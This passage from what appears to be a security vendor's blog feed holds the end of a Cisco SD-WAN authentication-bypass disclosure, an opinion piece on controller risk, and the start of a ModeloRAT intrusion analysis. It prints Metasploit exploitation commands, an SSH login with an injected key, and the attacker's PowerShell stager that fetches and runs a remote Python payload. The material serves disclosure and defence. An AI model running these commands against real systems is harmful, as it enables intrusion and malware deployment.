begin, the attacker loads the </span><a href="https://github.com/rapid7/metasploit-framework/pull/21463" target="_self"><span style='font-size: undefined;'>module</span></a><span style='font-size: undefined;'> in Metasploit and configures the required options.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt10ac6055852a0df2/6a04b7c97354eb565df0b82f/metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" caption="Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt10ac6055852a0df2/6a04b7c97354eb565df0b82f/metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-uid="blt10ac6055852a0df2" data-sys-asset-filename="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass" data-sys-asset-alt="metasploit-module-options-cisco-sdwan-vhub-auth-bypass.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Metasploit module options for cisco_sdwan_vhub_auth_bypass</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The module will perform the authentication bypass and then inject an attacker controlled SSH public key into the authorized keys file for the </span><span style='font-size: undefined;'><span data-type='inlineCode'>vmanage-admin</span></span><span style='font-size: undefined;'> user. The module will generate a new RSA key-pair prior to exploitation, so that the attacker will inject a public key for which they have the corresponding private key.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker then sets the target and runs the module.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="shell-session">msf6 auxiliary(admin/networking/cisco_sdwan_vhub_auth_bypass) &gt; set RHOSTS 192.168.80.11
msf6 auxiliary(admin/networking/cisco_sdwan_vhub_auth_bypass) &gt; run</pre><p style="direction: ltr;">⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e5c072688e3578f/6a04b854c672242154888f52/vhub-authentication-bypass-ssh-key-injection.png" alt="vhub-authentication-bypass-ssh-key-injection.png" caption="Figure 2: Module output showing the vHub authentication bypass and SSH key injection" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="vhub-authentication-bypass-ssh-key-injection.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8e5c072688e3578f/6a04b854c672242154888f52/vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-uid="blt8e5c072688e3578f" data-sys-asset-filename="vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Module output showing the vHub authentication bypass and SSH key injection" data-sys-asset-alt="vhub-authentication-bypass-ssh-key-injection.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: Module output showing the vHub authentication bypass and SSH key injection</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker can now SSH into the NETCONF service over TCP port 830 by running the following command (as instructed by the exploit above).</span></p><p style="direction: ltr;"><span style='color:rgb(197, 34, 31);font-size: undefined;'></span></p><pre language="shell-session">ssh -i /home/cryptocat/.msf4/loot/20260501115947_default_192.168.80.11_cisco.sdwan.sshk_491665.pem vmanage-admin@192.168.80.11 -p 830</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>SSH public key authentication will succeed, and the attacker will have successfully established a connection to the NETCONF service.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt188407745635ce54/6a04bad8858e72fcb817ab91/ssh-connection-to-NETCONF-service.png" alt="ssh-connection-to-NETCONF-service.png" caption="Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ssh-connection-to-NETCONF-service.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt188407745635ce54/6a04bad8858e72fcb817ab91/ssh-connection-to-NETCONF-service.png" data-sys-asset-uid="blt188407745635ce54" data-sys-asset-filename="ssh-connection-to-NETCONF-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin" data-sys-asset-alt="ssh-connection-to-NETCONF-service.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Successful SSH connection to the NETCONF service as vmanage-admin</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>At this point the attacker can begin to execute arbitrary NETCONF commands, for example the following “get-config” command can be run by the attacker in the NETCONF session.</span></p><p style="direction: ltr;"><span style='color:rgb(55, 71, 79);font-size: undefined;'></span></p><pre language="xml">&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"&gt;&lt;capabilities&gt;&lt;capability&gt;urn:ietf:params:netconf:base:1.0&lt;/capability&gt;&lt;/capabilities&gt;&lt;/hello&gt;]]&gt;]]&gt;&lt;rpc message-id="101" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"&gt;&lt;get-config&gt;&lt;source&gt;&lt;running/&gt;&lt;/source&gt;&lt;/get-config&gt;&lt;/rpc&gt;]]&gt;]]&gt;</pre><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The output of the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>get-config</span><span style='font-size: undefined;'> command is shown below.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5bbb35c1dc9d9a9e/6a04bb39aa1d13b2fbcb537a/NETCONF-get-config-output.png" alt="NETCONF-get-config-output.png" caption="Figure 4: NETCONF get-config output from the compromised controller" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="NETCONF-get-config-output.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5bbb35c1dc9d9a9e/6a04bb39aa1d13b2fbcb537a/NETCONF-get-config-output.png" data-sys-asset-uid="blt5bbb35c1dc9d9a9e" data-sys-asset-filename="NETCONF-get-config-output.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: NETCONF get-config output from the compromised controller" data-sys-asset-alt="NETCONF-get-config-output.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: NETCONF get-config output from the compromised controller</figcaption></div></figure><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Customers are advised to upgrade to an appropriate fixed software release as indicated in the Fixed Software section of the Cisco Security Advisory. The following tables indicate the appropriate fixed software releases.</span></p><p></p><table><colgroup data-width='698'><col style="width:48.42406876790831%"/><col style="width:51.57593123209169%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Cisco Catalyst SD-WAN Release</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>First Fixed Release</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Earlier than 20.9*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Migrate to a fixed release</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.9</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.9.9.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.10</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.12.7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.11*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.12.7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.12.5.4, 20.12.6.2, 20.12.7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.13*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.15.5.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.14*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.15.5.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.15.4.4, 20.15.5.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.16*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.18.2.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.18</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>20.18.2.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>26.1.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>26.1.1.1</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'><em>*These releases have reached the </em></span><a href="https://www.cisco.com/c/en/us/products/routers/sd-wan/eos-eol-notice-listing.html" target="_blank"><span style='font-size: undefined;'><em>end of software maintenance</em></span></a><span style='font-size: undefined;'><em>. Cisco strongly encourages customers to upgrade to a </em></span><a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/release/notes/compatibility-and-server-recommendations.html" target="_blank"><span style='font-size: undefined;'><em>supported release</em></span></a><span style='font-size: undefined;'><em>.</em></span></p><p><br/><span style='font-size: undefined;'>For additional details, please see the vendor </span><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" target="_blank"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Vendor statement</h2><p style="direction: ltr;"><span style='font-size: undefined;'><em>"Cisco values the role of the security research community in helping maintain a secure ecosystem and we appreciate the collaboration with Rapid7. We have released a software update to remediate the identified vulnerability. We remain committed to transparent communication and to providing our customers with the robust security and resilience they expect."</em></span></p><h2 style="direction: ltr;">Rapid7 customers</h2><p>Exposure Command, InsightVM and Nexpose customers will be able to assess their exposure to CVE-2026-20182 with an authenticated vulnerability check expected to be available in the May 14th, 2026 content release.</p><h2 style="direction: ltr;">Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher, and Jonah Burgess, Senior Security Researcher, both at Rapid7 and is being disclosed in accordance with Rapid7’s </span><a href="/security/disclosure" target="_self"><span style='font-size: undefined;'>vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2>Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 9, 2026:</strong></span><span style='font-size: undefined;'> Rapid7 makes initial outreach to Cisco who confirms contact the same day. Rapid7 discloses the technical writeup and exploit code to Cisco.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 11, 2026:</strong></span><span style='font-size: undefined;'> Cisco confirms receipt of the technical writeup and exploit code and suggests a disclosure date of May 7, 2026.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 20, 2026:</strong></span><span style='font-size: undefined;'> Cisco confirms the vulnerability findings, and that a CVE will be reserved.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 21, 2026:</strong></span><span style='font-size: undefined;'> Cisco provides reserved CVE identifier and remediation guidance.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 24, 2026:</strong></span><span style='font-size: undefined;'> Cisco provides remediation version numbers, alignment on CWE and CVSS scoring, and requests moving disclosure date to May 14.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 14, 2026:</strong></span><span style='font-size: undefined;'> This disclosure.</span></p></li></ul><h2 style="direction: ltr;">Updates</h2><ul><li><span style='font-size: undefined;'><strong>May 15, 2026:</strong></span><span style='font-size: undefined;'> Added link to the Metasploit module.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed</link>
      <guid isPermaLink="false">bltc12969d6fc83e5d4</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Thu, 14 May 2026 16:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[The Dark Side of Efficiency: When Network Controllers Become "God Mode" for Attackers]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Imagine you build a massive corporate campus with every security control money can buy. Blast resistant doors. Biometric scanners. Guards at every entrance. Maybe something similar to the infamous Death Star. On paper, it looks fantastic. Then, somewhere along the way, somebody decides the maintenance team needs a universal key that opens every door in the building without setting off any alarms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That certainly makes operations easier, but it also means one mistake, one compromise (like a well placed photon torpedo), or one very bad decision can unravel the whole thing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That is basically the problem we keep running into in modern enterprise networking.</span></p><h2 style="direction: ltr;">Why SD-WAN controllers create concentrated risk</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This week, Rapid7 researchers Stephen Fewer and Jonah Burgess </span><a href="/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed" target="_self"><span style='font-size: undefined;'>disclosed CVE-2026-20182</span></a><span style='font-size: undefined;'>, a maximum severity (CVSS 10.0) vulnerability in the Cisco Catalyst SD-WAN Controller. The technical details matter, and quite a bit, at that, but the bigger lesson here is even more important. This bug is a reminder that we keep designing infrastructure for efficiency first and then acting surprised when attackers go after the one component that controls everything.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To put it simply, the flaw behaves like a master key. An attacker can present themselves to the controller as a trusted network router and, if the system accepts that claim without properly validating it, they can obtain the highest level of administrative access. That is the cybersecurity version of a Jedi mind trick. The controller is effectively told to trust something it has no business trusting, as if an attacker waves a hand and says, “</span><span style='font-size: undefined;'><em>these are not the droids you are looking for</em></span><span style='font-size: undefined;'>”. And with CVE-2026-20182, the controller just nods and lets them pass.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>And that becomes extremely important when you look at how these environments are built.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A decade ago, managing a global enterprise network meant touching thousands of individual routers across branch locations. It was slow, error-prone, and frankly a little miserable for the people responsible for keeping it all running. So the industry did what the industry usually does. We centralized control. We pulled the decision-making out of all those edge devices and moved it into a central controller.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>From an operations standpoint, that was a huge win. I will gladly give credit where it is due. SD-WAN solved real problems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It also created a very attractive target.</span></p><h2 style="direction: ltr;">Why central management platforms are attractive targets</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Once you move the brains of the operation into a single place, that place becomes the thing an attacker wants most. Compromising one branch router is useful. Compromising the controller that manages the entire estate is a very different conversation. Now you are talking about the ability to reroute traffic, intercept communications, push malicious configuration, or simply break connectivity across the whole organization.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That is the real paradox here. The same architecture that gives defenders scale and simplicity can also give attackers a single point of catastrophic leverage.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A few years ago, finding and exploiting a quiet authentication bypass in a core networking appliance was mostly the work of highly capable nation-state teams. That is not the world we live in anymore, especially as </span><a href="/blog/post/ai-what-project-glasswing-means-for-security-leaders" target="_self"><span style='font-size: undefined;'>AI makes exploitation faster</span></a><span style='font-size: undefined;'> to analyze, adapt, and operationalize. The reality of it is that offensive tradecraft does not stay exclusive for very long. It gets copied, adapted, automated, and eventually handed down to groups with very different goals.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For nation-state operators, a bug like this (as seen with the actively exploited </span><a href="/blog/post/etr-critical-cisco-catalyst-vulnerability-exploited-in-the-wild-cve-2026-20127" target="_self"><span style='font-size: undefined;'>CVE-2026-20127</span></a><span style='font-size: undefined;'>) is ideal for pre positioning. They are usually not looking for a smash and grab. They want persistence. They want access that blends in. They want to sit in the right place long enough to observe, influence, and pivot when the time is right. An SD-WAN controller is a great place to do that, because it lives in the middle of trust relationships most organizations rarely question.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For ransomware groups, the value proposition is even more obvious. If you can compromise central infrastructure, you do not have to fight for access to one system at a time. You are standing on the control plane of the enterprise, facing a dramatically lower barrier to initial access and large-scale disruption.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Now, to be fair, not every bug turns into internet wide exploitation overnight and not every vulnerability becomes a one click offensive toolkit. We should avoid sensationalizing that part. But we should also be honest about where the pressure is today. Attackers have become very good at turning central infrastructure weaknesses into high impact operations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What defenders should do now</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>First, bugs like this are going to happen again. As long as we keep building extremely complex systems to manage global infrastructure, there will be flaws. That is not cynicism. That is just reality.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Second, organizations need to stop assuming that trusted administrative systems are inherently safe just because they sit in the middle of the network and have important sounding names. If your controller is compromised, what happens next? What can it reach? What can it change? How much of the enterprise can it influence without another human ever noticing?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That blast radius question is the one that matters.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Defending against this kind of problem requires more than patching, even though patching absolutely needs to happen. It means building environments that can survive the compromise of a critical management system. Network segmentation matters. Monitoring administrative traffic matters, whether that is handled internally or through an </span><a href="/services/managed-detection-and-response-mdr" target="_self"><span style='font-size: undefined;'>MDR provider</span></a><span style='font-size: undefined;'> that can help catch suspicious behavior before it turns into a much larger problem. Tight control over outbound communications from infrastructure devices matters. So does limiting which systems are allowed to talk to the controller in the first place.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In other words, we need to design with the assumption that even high trust infrastructure can fail in ugly ways.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The immediate guidance for defenders is straightforward: apply the vendor supplied patches for Cisco Catalyst SD-WAN Controllers as quickly as possible. That is the first move, not the last one.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The longer term lesson for leadership is bigger than this one vulnerability. Efficiency is great right up until it creates unquestioned authority in a single device or platform. When that happens, you have not removed complexity. You have concentrated risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>And attackers have noticed.</span></p><p><span style='font-size: undefined;'><em>Register for Rapid7’s upcoming webinar on CVE-2026-20182 </em></span><a href="https://www.brighttalk.com/webcast/10457/668367?utm_source=blog&amp;utm_medium=website&amp;utm_content=efficiency-trap-webinar&amp;utm_campaign=global-pla-cisco-media-blog-prospect-eng" target="_blank"><span style='font-size: undefined;'><em>here</em></span></a><span style='font-size: undefined;'><em>.</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-efficiencys-dark-side-network-controllers-in-god-mode-attackers-sd-wan</link>
      <guid isPermaLink="false">blt3f01705e2f95d493</guid>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Douglas McKee, Director, Vulnerability Intelligence]]></dc:creator>
      <pubDate>Thu, 14 May 2026 16:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Attackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Therefore, this attack was particularly concerning due to the way the intrusion shifted from endpoint compromise to broader identity-driven risk. And while it was not surprising that the attacker used a novel technique, what </span><span style='font-size: undefined;'><em>was</em></span><span style='font-size: undefined;'> concerning was how the attacker was able to chain together familiar enterprise weaknesses into a fast-moving and operationally effective intrusion.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By abusing Teams external access, the threat actor delivered a Dropbox-hosted Python payload that established command-and-control, deployed multiple backdoors, and began mapping the internal environment. The attacker then escalated privileges to SYSTEM using CVE-2023-36036 before deploying a fake Windows lock screen designed to harvest the user’s domain password.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once valid credentials were obtained, the intrusion shifted from endpoint compromise to broader identity-driven risk. The attacker moved laterally to a second host, used legitimate tooling such as DumpIt to collect system memory, which was likely exfiltrated via an anonymous file-sharing service. This progression underscores a key reality for defenders: Once collaboration, identity, and endpoint controls are bypassed or weakened, attackers can rapidly convert initial access into meaningful enterprise exposure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s technical analysis linked the Python malware to ModeloRAT, a framework previously documented by multiple security vendors in browser extension campaigns and associated with the KongTuke group. More broadly, this intrusion demonstrates how trusted communication channels, Living-off-the-Land techniques, and credential-focused tradecraft continue to challenge traditional security controls. The takeaways here are clear:</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>For CISOs:</strong></span><span style='font-size: undefined;'> Collaboration tools are part of your attack surface. Attackers used Teams to reach users directly. Security, identity protection, endpoint visibility, and rapid detection engineering must be treated as connected parts of the same defense strategy, not separate control domains.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>For defenders:</strong></span><span style='font-size: undefined;'> Old vulnerabilities and trusted tools still work. The attack combined a patched vulnerability (CVE-2023-36036) with widely trusted tools like Python, PowerShell, and Dropbox. None of these are unusual in enterprise environments, which is precisely what allowed the attacker to blend in while moving quickly. It’s an obvious restatement, but external access should always be controlled and monitored. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The challenge isn’t identifying one suspicious event; it’s recognizing when normal activity starts to form a pattern, and acting before that pattern turns into widespread exposure.</span></p><h3>Rapid7 coverage</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s </span><a href="/platform/threat-intelligence-tip" target="_self"><span style='font-size: undefined;'>Intelligence Hub</span></a><span style='font-size: undefined;'>, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a947872f4b8cc65/6a0492db06f01ae81f4cdb1a/ModeloRAT-attack-chain-teams-payload.png" alt="ModeloRAT-attack-chain-teams-payload.png" caption="Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ModeloRAT-attack-chain-teams-payload.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a947872f4b8cc65/6a0492db06f01ae81f4cdb1a/ModeloRAT-attack-chain-teams-payload.png" data-sys-asset-uid="blt8a947872f4b8cc65" data-sys-asset-filename="ModeloRAT-attack-chain-teams-payload.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration." data-sys-asset-alt="ModeloRAT-attack-chain-teams-payload.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration.</figcaption></div></figure><h2>A door that was never closed</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The intrusion started with abuse of Microsoft Teams external access. This feature, enabled by default in some environments, allows users in one tenant to initiate direct chats with users in another. In our incident, the attacker used a newly created tenant </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>UCICasociacion.onmicrosoft[.]com</em></span></span><span style='font-size: undefined;'> to impersonate “IT Support” and messaged a targeted employee.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This approach mirrors tradecraft seen in Octo Tempest-style campaigns. Octo Tempest (alias Scattered Spider, UNC3944, 0ktapus) is a financially motivated cybercriminal group active since 2022, known for aggressive social engineering tactics including helpdesk impersonation, SIM swapping, and MFA manipulation. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Shortly after the interaction, a hidden PowerShell command executed on the victim’s machine, staging the initial payload.</span></p><h2 style="direction: ltr;">Stager: Bring your own Python</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Within minutes of the Teams interaction, a PowerShell stager executed on the endpoint and reached out to Dropbox to retrieve a ZIP archive (</span><span style='font-size: undefined;'><span data-type='inlineCode'>Winp.zip</span></span><span style='font-size: undefined;'>) into the user’s AppData directory.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The archive was immediately extracted and deleted, likely to reduce on-disk artifacts and avoid potentially raising suspicion.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The payload contained a portable WinPython environment, which the attacker used to launch the next stage:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>collector.py</span></span><span style='font-size: undefined;'> (reconnaissance)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Pmanager.py</span></span><span style='font-size: undefined;'> (primary C2 agent, Modelo RAT)</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Execution was handled via </span><span style='font-size: undefined;'><span data-type='inlineCode'>pythonw.exe</span></span><span style='font-size: undefined;'>, which allowed the script to </span>run in the background without showing the terminal window.</p><p style="direction: ltr;"><span style='color:rgb(197, 34, 31);font-size: undefined;'></span></p><pre language="python">iwr -Uri "https://www.dropbox[.]com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:appdata\Winp.zip"; 
Expand-Archive -Path "$env:appdata\Winp.zip" -DestinationPath "$env:appdata"; 
rm "$env:appdata\Winp.zip"; 
Start-Sleep -Seconds 5; 
Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\collector.py; 
Start-Sleep -Seconds 30; 
Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\Pmanager.py; 
Start-Sleep -Seconds 5</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 2: PowerShell stager retrieving and executing portable Python payload.</em></span></p><h2 style="direction: ltr;">Reconnaissance: Environment discovery via native tools</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The first Python module executed by the attacker was </span><span style='font-size: undefined;'><span data-type='inlineCode'>collector.py</span></span><span style='font-size: undefined;'>, a post-exploitation information gatherer designed to silently profile the host and save the results to </span><span style='font-size: undefined;'><span data-type='inlineCode'><em>%TEMP%\configA.json</em></span></span><span style='font-size: undefined;'>. Additionally, before any of the recon the collector.py computes a host fingerprint. This 8-character fingerprint is what the operator's C2 server uses to identify this victim.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The script gathered the following information:</span></p><table><colgroup data-width='1297'><col style="width:23.515805705474172%"/><col style="width:76.48419429452584%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>System identity and patch level</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>systeminfo, domain queries</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Privilege context</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>whoami /all and .NET Security.Principal checks (USER / ADMIN / SYSTEM)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Processes and services</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Get-Process, Get-Service</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Network visibility</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>getmac.exe, arp -a, Get-NetTCPConnection, ping.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Domain visibility</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: 